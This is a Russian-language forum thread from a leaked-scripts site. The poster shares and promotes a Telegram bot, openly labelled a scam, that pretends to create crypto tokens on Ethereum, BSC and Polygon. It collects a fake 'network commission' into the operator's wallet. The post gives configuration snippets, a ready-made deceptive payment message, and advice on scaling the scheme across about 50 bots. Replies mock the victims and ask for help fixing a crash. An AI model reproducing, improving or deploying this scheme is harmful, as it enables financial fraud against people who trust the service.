[Fake/Scam] Бот для создание своего криптотокена [ETH, BSC, POLYGON] | End Way - форум программирования и сливов различных скриптов
  • Присоединяйтесь к нам в телеграм канал! EndWay канал | EndSoft канал | EWStudio канал
  • Хочешь поставить скрипт, но не умеешь?
    А может ты хочешь свой скрипт на основе слитого?

    Тогда добро пожаловать в нашу студию разработки!

    Телеграм бот: EWStudioBot
    Телеграм канал: EWStudio

[Fake/Scam] Бот для создание своего криптотокена [ETH, BSC, POLYGON]

BOCTOK

Сеньор
Автор темы
6 Авг 2024
15
44
13
На связи ВОСТОК!
Погнали!
EXCLUSIVE F
0R ENDWAY

Скрин:

Screen
Скрин был нечитаем, прогнал через upscale, поэтому такой большой)

Короче, суть то в том, что это направление, особенно для скама, нулёвое, по сути
В том плане, что по этому вектору никто не делал ничего, а значит сделаю я
По настройке все просто:
1. TOKEN = 'token' # подставляете свой токен из бот фазер

2. if network == 'ethereum':
fee = 0.1 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'ETH'
elif network == 'bsc':
fee = 0.05 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'BNB'
else:
fee = 0.01 # Ставите любую комсу, которую наш залетный клиент должен оплатить за создание токена
currency = 'MATIC'

3. wallet_addresses = {
'ethereum': '0xYourEthereumWalletAddress', # Подставляете ваш кошелек в эфире
'bsc': '0xYourBSCWalletAddress', # Подставляете ваш кошелек в бск
'polygon': '0xYourPolygonWalletAddress' # Подставляете ваш кошелек в полигоне

Этот кошелек будет выдан в конце процесса, на него наш клиент будет переводить крипту, якобы за оплату комиссии, за создание токена

Некоторые захотят спросить - восток, а почему такой простой бот? Я отвечу - конкретно в ДАННОМ СЛУЧАЕ нужно, на мой взгляд, именно так. Усложнять не нужно.

Сама концепция продумана так, чтоб вопросов не было.

Например:
"Для создания токена FIJIthereum (FIETH) в сети ETHEREUM с общей эмиссией 1000000 и 2 знаками после запятой, вам необходимо оплатить комиссию сети в размере 0.15000000000000002 ETH с того кошелька, на который будет зачислена вся эмиссия выпущенного токена. После оплаты, в течение 12-ти часов токен автоматически поступит на ваш кошелек (с которого вы оплатили комиссию)."


Вопросов не будет, ведь тут указано все, что вся эмиссия будет зачислена автоматом, на кош, с которого оплатили
Это облегчает процесс для юзера и для владельца бота
Нету лишнего общения и вопросов


Окей, Восток, а зачем это и как я могу на этом заработать? Да очень просто! Как я и упомянул - конкуренции ноль, ферму ботов, штук 50 поднимаешь, занимаешь юзеры по ключевым словам типо "TokenCreate / CryptoCreate" и т.п. и ждешь монету

Бот состоит из 1-го файла! EASY

 
Like
  • 7
Реакции: 6 users

BOCTOK

Сеньор
Автор темы
6 Авг 2024
15
44
13
alexkron88, Бро, тут дело не в тупости мамонта, а в том, что немногие знают как создаётся токен
И вот они решили создать, в яндексе ввели, а там пару сайтов по созданию, которые требуют много денег за услугу
Они ищут альтернативу в тг, находят, цена дешевле
Они оплачивают
 

viking557

Джун
29 Дек 2023
14
0
1
Когда доходишь до эмиссии и вводишь туда буквы , а не цифры , бот закрывается . Приходиться его опять запускать так каждый раз.
 

viking557

Джун
29 Дек 2023
14
0
1
Что сделать , какой код прописать, что бы бот не закрывался на эмиссии, когда буквами прописываешь в ней ? Заранее благодарю
 
Активность:
Пока что здесь никого нет